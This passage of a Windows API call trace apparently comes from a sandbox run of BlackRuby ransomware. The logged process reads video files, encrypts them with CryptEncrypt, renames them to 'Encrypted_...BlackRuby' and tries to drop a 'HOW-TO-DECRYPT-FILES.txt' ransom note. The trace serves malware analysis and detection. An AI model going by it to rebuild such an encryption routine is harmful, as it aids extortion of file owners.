"c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.409] GetLastError () returned 0x0 [0062.409] GetFileType (hFile=0x258) returned 0x1 [0062.409] SetErrorMode (uMode=0x0) returned 0x1 [0062.409] GetFileType (hFile=0x258) returned 0x1 [0062.409] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0xd068 [0062.409] GetLastError () returned 0x0 [0062.410] ReadFile (in: hFile=0x258, lpBuffer=0x1c8ecf4, nNumberOfBytesToRead=0xd068, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c8ecf4*, lpNumberOfBytesRead=0x18ecac*=0xd068, lpOverlapped=0x0) returned 1 [0062.410] GetLastError () returned 0x0 [0062.410] CloseHandle (hObject=0x258) returned 1 [0062.410] GetLastError () returned 0x0 [0062.410] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.410] GetLastError () returned 0x0 [0062.410] SetErrorMode (uMode=0x1) returned 0x0 [0062.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511a6880, ftCreationTime.dwHighDateTime=0x1d35a13, ftLastAccessTime.dwLowDateTime=0xd5108af0, ftLastAccessTime.dwHighDateTime=0x1d35060, ftLastWriteTime.dwLowDateTime=0xd5108af0, ftLastWriteTime.dwHighDateTime=0x1d35060, nFileSizeHigh=0x0, nFileSizeLow=0xd068)) returned 1 [0062.411] GetLastError () returned 0x0 [0062.411] SetErrorMode (uMode=0x0) returned 0x1 [0062.421] CryptImportKey (in: hProv=0x37c790, pbData=0x1d031a0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360fa0) returned 1 [0062.421] GetLastError () returned 0x0 [0062.421] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.421] GetLastError () returned 0x0 [0062.426] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.426] GetLastError () returned 0x0 [0062.426] CryptDuplicateKey (in: hKey=0x360fa0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x3609e0) returned 1 [0062.426] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.426] GetLastError () returned 0x0 [0062.426] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1d301ec*=0x1, dwFlags=0x0) returned 1 [0062.426] GetLastError () returned 0x0 [0062.426] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1d301b8, dwFlags=0x0) returned 1 [0062.426] GetLastError () returned 0x0 [0062.426] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d30234*, pdwDataLen=0x18ec9c*=0xd160, dwBufLen=0xd160 | out: pbData=0x1d30234*, pdwDataLen=0x18ec9c*=0xd160) returned 1 [0062.427] GetLastError () returned 0x0 [0062.429] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b5e880*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1b5e880*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.430] GetLastError () returned 0x0 [0062.430] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b5e8b0*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1b5e8b0*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.430] GetLastError () returned 0x0 [0062.430] CryptDestroyKey (hKey=0x360fa0) returned 1 [0062.430] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.431] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0062.431] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.431] GetLastError () returned 0x0 [0062.431] SetErrorMode (uMode=0x1) returned 0x0 [0062.431] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.432] GetLastError () returned 0xb7 [0062.432] GetFileType (hFile=0x258) returned 0x1 [0062.432] SetErrorMode (uMode=0x0) returned 0x1 [0062.432] GetFileType (hFile=0x258) returned 0x1 [0062.432] WriteFile (in: hFile=0x258, lpBuffer=0x1b5e8e0*, nNumberOfBytesToWrite=0xd170, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x1b5e8e0*, lpNumberOfBytesWritten=0x18ecb8*=0xd170, lpOverlapped=0x0) returned 1 [0062.434] GetLastError () returned 0xb7 [0062.434] CloseHandle (hObject=0x258) returned 1 [0062.435] GetLastError () returned 0xb7 [0062.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv", lpFilePart=0x0) returned 0x49 [0062.435] GetLastError () returned 0xb7 [0062.435] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_dR9Zuh9UN8gkmKK2UGRjHYTIo4NyKU5hEEmtJ54R1.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_dR9Zuh9UN8gkmKK2UGRjHYTIo4NyKU5hEEmtJ54R1.BlackRuby", lpFilePart=0x0) returned 0x7a [0062.435] GetLastError () returned 0xb7 [0062.435] SetErrorMode (uMode=0x1) returned 0x0 [0062.435] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x511a6880, ftCreationTime.dwHighDateTime=0x1d35a13, ftLastAccessTime.dwLowDateTime=0xd5108af0, ftLastAccessTime.dwHighDateTime=0x1d35060, ftLastWriteTime.dwLowDateTime=0x2d697020, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xd170)) returned 1 [0062.435] GetLastError () returned 0xb7 [0062.435] SetErrorMode (uMode=0x0) returned 0x1 [0062.435] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\ftdtPIsL.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\ftdtpisl.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_dR9Zuh9UN8gkmKK2UGRjHYTIo4NyKU5hEEmtJ54R1.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_dr9zuh9un8gkmkk2ugrjhytio4nyku5heemtj54r1.blackruby")) returned 1 [0062.436] GetLastError () returned 0xb7 [0062.437] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.437] GetLastError () returned 0xb7 [0062.437] SetErrorMode (uMode=0x1) returned 0x0 [0062.437] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.437] GetLastError () returned 0x5 [0062.438] SetErrorMode (uMode=0x0) returned 0x1 [0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.439] GetLastError () returned 0x5 [0062.439] SetErrorMode (uMode=0x1) returned 0x0 [0062.439] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1b88f14 | out: lpFileInformation=0x1b88f14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46204c90, ftCreationTime.dwHighDateTime=0x1d3501a, ftLastAccessTime.dwLowDateTime=0x78f0b650, ftLastAccessTime.dwHighDateTime=0x1d35650, ftLastWriteTime.dwLowDateTime=0x78f0b650, ftLastWriteTime.dwHighDateTime=0x1d35650, nFileSizeHigh=0x0, nFileSizeLow=0x16e58)) returned 1 [0062.439] GetLastError () returned 0x5 [0062.439] SetErrorMode (uMode=0x0) returned 0x1 [0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.439] GetLastError () returned 0x5 [0062.439] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.439] GetLastError () returned 0x5 [0062.439] SetErrorMode (uMode=0x1) returned 0x0 [0062.439] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.439] GetLastError () returned 0x0 [0062.439] GetFileType (hFile=0x258) returned 0x1 [0062.439] SetErrorMode (uMode=0x0) returned 0x1 [0062.439] GetFileType (hFile=0x258) returned 0x1 [0062.439] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x16e58 [0062.439] GetLastError () returned 0x0 [0062.440] ReadFile (in: hFile=0x258, lpBuffer=0x2bbf0d0, nNumberOfBytesToRead=0x16e58, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x2bbf0d0*, lpNumberOfBytesRead=0x18ecac*=0x16e58, lpOverlapped=0x0) returned 1 [0062.441] GetLastError () returned 0x0 [0062.441] CloseHandle (hObject=0x258) returned 1 [0062.441] GetLastError () returned 0x0 [0062.442] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.442] GetLastError () returned 0x0 [0062.442] SetErrorMode (uMode=0x1) returned 0x0 [0062.442] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46204c90, ftCreationTime.dwHighDateTime=0x1d3501a, ftLastAccessTime.dwLowDateTime=0x78f0b650, ftLastAccessTime.dwHighDateTime=0x1d35650, ftLastWriteTime.dwLowDateTime=0x78f0b650, ftLastWriteTime.dwHighDateTime=0x1d35650, nFileSizeHigh=0x0, nFileSizeLow=0x16e58)) returned 1 [0062.442] GetLastError () returned 0x0 [0062.442] SetErrorMode (uMode=0x0) returned 0x1 [0062.442] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c708) returned 1 [0062.442] GetLastError () returned 0x0 [0062.477] CryptImportKey (in: hProv=0x37c708, pbData=0x1be51d0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360a20) returned 1 [0062.477] GetLastError () returned 0x0 [0062.477] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.477] GetLastError () returned 0x0 [0062.482] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] CryptDuplicateKey (in: hKey=0x360a20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360de0) returned 1 [0062.482] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] CryptSetKeyParam (hKey=0x360de0, dwParam=0x4, pbData=0x1c1221c*=0x1, dwFlags=0x0) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] CryptSetKeyParam (hKey=0x360de0, dwParam=0x1, pbData=0x1c121e8, dwFlags=0x0) returned 1 [0062.482] GetLastError () returned 0x0 [0062.482] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c008d0*, pdwDataLen=0x18ec9c*=0x16f50, dwBufLen=0x16f50 | out: pbData=0x2c008d0*, pdwDataLen=0x18ec9c*=0x16f50) returned 1 [0062.483] GetLastError () returned 0x0 [0062.484] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c12278*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c12278*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.484] GetLastError () returned 0x0 [0062.484] CryptEncrypt (in: hKey=0x360de0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c122a8*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c122a8*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.484] GetLastError () returned 0x0 [0062.486] CryptDestroyKey (hKey=0x360a20) returned 1 [0062.486] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.486] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0062.486] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.486] GetLastError () returned 0x0 [0062.486] SetErrorMode (uMode=0x1) returned 0x0 [0062.486] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.488] GetLastError () returned 0xb7 [0062.488] GetFileType (hFile=0x258) returned 0x1 [0062.488] SetErrorMode (uMode=0x0) returned 0x1 [0062.488] GetFileType (hFile=0x258) returned 0x1 [0062.490] CloseHandle (hObject=0x258) returned 1 [0062.490] GetLastError () returned 0xb7 [0062.490] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4", lpFilePart=0x0) returned 0x47 [0062.490] GetLastError () returned 0xb7 [0062.490] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_j7kZ1agKoxt5u3g3i7RrtnJKlhaXIvEA148ZRNeEcYT.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_j7kZ1agKoxt5u3g3i7RrtnJKlhaXIvEA148ZRNeEcYT.BlackRuby", lpFilePart=0x0) returned 0x7c [0062.490] GetLastError () returned 0xb7 [0062.490] SetErrorMode (uMode=0x1) returned 0x0 [0062.490] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46204c90, ftCreationTime.dwHighDateTime=0x1d3501a, ftLastAccessTime.dwLowDateTime=0x78f0b650, ftLastAccessTime.dwHighDateTime=0x1d35650, ftLastWriteTime.dwLowDateTime=0x2d709440, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x16f60)) returned 1 [0062.490] GetLastError () returned 0xb7 [0062.490] SetErrorMode (uMode=0x0) returned 0x1 [0062.490] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\gJN mh.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\gjn mh.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_j7kZ1agKoxt5u3g3i7RrtnJKlhaXIvEA148ZRNeEcYT.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_j7kz1agkoxt5u3g3i7rrtnjklhaxivea148zrneecyt.blackruby")) returned 1 [0062.491] GetLastError () returned 0xb7 [0062.491] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.491] GetLastError () returned 0xb7 [0062.492] SetErrorMode (uMode=0x1) returned 0x0 [0062.492] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.492] GetLastError () returned 0x5 [0062.492] SetErrorMode (uMode=0x0) returned 0x1 [0062.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.493] GetLastError () returned 0x5 [0062.493] SetErrorMode (uMode=0x1) returned 0x0 [0062.493] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\h1cquyyg85mqup3hbyo.avi"), fInfoLevelId=0x0, lpFileInformation=0x1c2f788 | out: lpFileInformation=0x1c2f788*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763b9b30, ftCreationTime.dwHighDateTime=0x1d34b49, ftLastAccessTime.dwLowDateTime=0xe3211be0, ftLastAccessTime.dwHighDateTime=0x1d34f67, ftLastWriteTime.dwLowDateTime=0xe3211be0, ftLastWriteTime.dwHighDateTime=0x1d34f67, nFileSizeHigh=0x0, nFileSizeLow=0x5e1c)) returned 1 [0062.493] GetLastError () returned 0x5 [0062.493] SetErrorMode (uMode=0x0) returned 0x1 [0062.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.493] GetLastError () returned 0x5 [0062.493] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.493] GetLastError () returned 0x5 [0062.493] SetErrorMode (uMode=0x1) returned 0x0 [0062.493] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\h1cquyyg85mqup3hbyo.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.493] GetLastError () returned 0x0 [0062.493] GetFileType (hFile=0x258) returned 0x1 [0062.493] SetErrorMode (uMode=0x0) returned 0x1 [0062.493] GetFileType (hFile=0x258) returned 0x1 [0062.493] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x5e1c [0062.493] GetLastError () returned 0x0 [0062.493] ReadFile (in: hFile=0x258, lpBuffer=0x1c31434, nNumberOfBytesToRead=0x5e1c, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1c31434*, lpNumberOfBytesRead=0x18ecac*=0x5e1c, lpOverlapped=0x0) returned 1 [0062.494] GetLastError () returned 0x0 [0062.494] CloseHandle (hObject=0x258) returned 1 [0062.494] GetLastError () returned 0x0 [0062.494] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.494] GetLastError () returned 0x0 [0062.494] SetErrorMode (uMode=0x1) returned 0x0 [0062.494] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\h1cquyyg85mqup3hbyo.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763b9b30, ftCreationTime.dwHighDateTime=0x1d34b49, ftLastAccessTime.dwLowDateTime=0xe3211be0, ftLastAccessTime.dwHighDateTime=0x1d34f67, ftLastWriteTime.dwLowDateTime=0xe3211be0, 